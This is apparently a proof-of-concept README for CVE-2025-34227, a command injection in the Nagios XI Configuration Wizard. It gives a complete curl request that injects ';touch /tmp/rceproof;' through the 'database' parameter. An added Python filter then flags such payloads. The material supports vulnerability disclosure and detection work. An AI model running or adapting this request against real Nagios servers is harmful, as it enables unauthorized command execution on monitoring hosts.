# CVE-2025-34227 Nagios XI Authenticated Command Injection in `Configuration Wizard`
Simple proof of concept repository for CVE-2025-34227, an authenticated command injection in Nagios XI -> `Configuration Wizard`
Full writeup here: https://theyhack.me/CVE-2025-34227-Nagios-XI-Wizard-Command-Injection/
## `curl` Proof of Concept
The payload below is in the `database` parameter: `;touch /tmp/rceproof;`.
After authenticating, supply your session id in the `Cookie: nagiosxi=` header and your `nsp` value in the POST body:
```bash
$ curl -s \
-H 'Cookie: nagiosxi=<your-session-id-here>' \
--data 'update=1&nsp=<your-nsp-value-here>&step=3&nextstep=5&wizard=mysqlquery&tpl=&hostname=localhost&operation=&selectedhostconfig=&services_serial=&serviceargs_serial=&config_serial=&ip_address=127.0.0.1&port=3306&username=test&password=test&database=information_schema%3Btouch+/tmp/rceproof%3B&queryname=curl+RCE+service&query=SELECT+1&warning=50&check_interval=1&retry_interval=1&critical=200&finishButton=' \
http://192.168.122.9/nagiosxi/config/monitoringwizard.php
```
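A defender-side check for the request shape above, added here as an example and not part of the original repository: it parses a form-encoded POST to `monitoringwizard.php` (as a WAF or reverse-proxy audit log would capture it) and rejects any `database` value that is not a plain MySQL identifier. The sample bodies are constructed from the README's `curl` command.

```python
import re
from urllib.parse import parse_qs

# Unquoted MySQL identifiers allow only letters, digits, '_' and '$' (max 64
# chars). Shell metacharacters such as ';' never belong in this field.
SAFE_DB_NAME = re.compile(r"^[A-Za-z0-9_$]{1,64}$")

WIZARD_PATH = "/nagiosxi/config/monitoringwizard.php"


def is_safe_db_name(value: str) -> bool:
    """True when `value` looks like a plain MySQL database name."""
    return bool(SAFE_DB_NAME.fullmatch(value))


def flag_wizard_request(path: str, body: str) -> list[str]:
    """Return findings for a POST body sent to the monitoring wizard.

    Only the `database` field of the `mysqlquery` wizard is checked, because
    that is the parameter the README shows the injection in; other wizard
    fields could be validated the same way (assumption, not from the page).
    """
    if not path.endswith(WIZARD_PATH):
        return []
    params = parse_qs(body, keep_blank_values=True)
    if params.get("wizard") != ["mysqlquery"]:
        return []
    findings = []
    for value in params.get("database", []):
        if not is_safe_db_name(value):
            findings.append(f"database parameter rejected: {value!r}")
    return findings


# Constructed sample bodies: the first mirrors the README's curl payload with
# the nsp placeholder kept, the second is a legitimate wizard run.
MALICIOUS_BODY = (
    "update=1&nsp=<nsp>&step=3&nextstep=5&wizard=mysqlquery&hostname=localhost"
    "&ip_address=127.0.0.1&port=3306&username=test&password=test"
    "&database=information_schema%3Btouch+/tmp/rceproof%3B&query=SELECT+1"
)
BENIGN_BODY = MALICIOUS_BODY.replace(
    "information_schema%3Btouch+/tmp/rceproof%3B", "information_schema"
)

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, flag_wizard_request(WIZARD_PATH, body) or "clean")
```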